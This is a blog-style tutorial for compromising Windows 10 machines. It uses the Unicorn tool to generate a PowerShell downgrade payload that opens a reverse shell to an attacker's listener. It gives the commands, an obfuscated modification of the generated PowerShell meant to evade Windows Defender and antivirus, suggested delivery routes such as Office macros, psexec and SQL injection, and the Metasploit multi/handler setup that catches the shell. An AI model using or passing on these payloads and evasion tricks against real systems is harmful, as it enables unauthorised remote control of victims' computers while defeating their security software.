Undetectable payload for Windows 10 – Unicorn tool payload modification

In this post, I will explain you how to hack Window 10 with publicly available tool, by using PowerShell downgrade attack and inject shellcode straight into memory. I will also show you how to slightly modify the code, to avoid detection of Windows defender and many other antivirus programs. For this purpose, I used tool Unicorn (LINK), written by Dave Kennedy (@HackingDave). Unfortunately, on day of writing this post, codes generated by Unicorn are not undetectable anymore. So this is the reason, why I needed to modify it.

Why I decided to write about this tool. Well, sometimes it is not so easy to write own PowerShell payload, obfuscate and encode it on proper way that will not raise the flag by antivirus systems. Therefore, I think this post will be useful for many hackers and security researches.

Using of this tool is very simple. All you need is preinstalled Metasploit tool, which will serve you as listener/handler, and of course Unicorn tool, which will automatically generate a PowerShell command. As soon as Unicorn generate PowerShell command, you can use it directly through CMD window or you can deliver it over a payload delivery system. There is many ways where you can use this attack. You can do it through macros in excel or word, through psexec inside Metasploit, SQLi, and many more. For more info, please check their page on github. As well, you will find there also other useful attack methods available inside Unicorn. In this case, I will focus only on PowerShell attack.

Note: please do not test vulnerability of antivirus programs on VirusTotal page, for generated PowerShell codes by Unicorn.

For the start, download Unicorn tool from github.

sudo git clone https://github.com/trustedsec/unicorn.git
cd unicorn

I assume you are using Kali Linux or Parrot OS, which already have preinstalled Metasploit. Otherwise, install also Metasploit.

With the next command, generate PowerShell code.

sudo python unicorn.py windows/shell_reverse_tcp 192.168.1.104 443

Let me explain what this command do. Unicorn will generate payload shell_reverse_tcp for Windows, and set listener IP, in my case 192.168.1.104. Of course, you should change IP to your IP. At the end of command line is port number, where reverse_tcp connection will establish.

As result of this command line, you will get result in powershell_attack.txt file. Copy the whole content of file in text editor, and modify the first part of code as following:

powershell -nop -ep bypass /w 1 /C "s''v IVb -;s''v XC e''c;s''v Ik ((g''v IVb).value.toString()+(g''v XC).value.toString());powershell -nop -ep bypass (g''v Ik).value.toString()

As you can see, I added -nop -ep bypass twice in this code.

Now you can use this code for attack. In my case, I saved it as batch file (.bat), and used it for further attack.

Note: I tried to generate and modify meterpreter reverse tcp payload, but it did not want to execute. I mean, windows defender did not detect it as virus, but also did not want to execute it.

The Unicorn tool will also ask you if you want to start Metasploit listener. If you decided not to start now, you can do it later over generated Metasploit resource script unicorn.rc. You can do it on the following way.

sudo msfconsole -r <path to resource script>

As soon as Metasploit is open, type exploit. Metasploit will start listening for connections. Please take a note, that listener must be running before the PowerShell code is execute on victim’s Windows machine.

You can also do it manually in Metasploit:

sudo msfconsole
use multi/handler
set payload windows/shell_reverse_tcp
set lport <your port>
set lhost <your IP>
exploit

That’s it. As I said, it is super easy to use. If everything went ok, you will get meterpreter shell window as on image bellow.

Add a Comment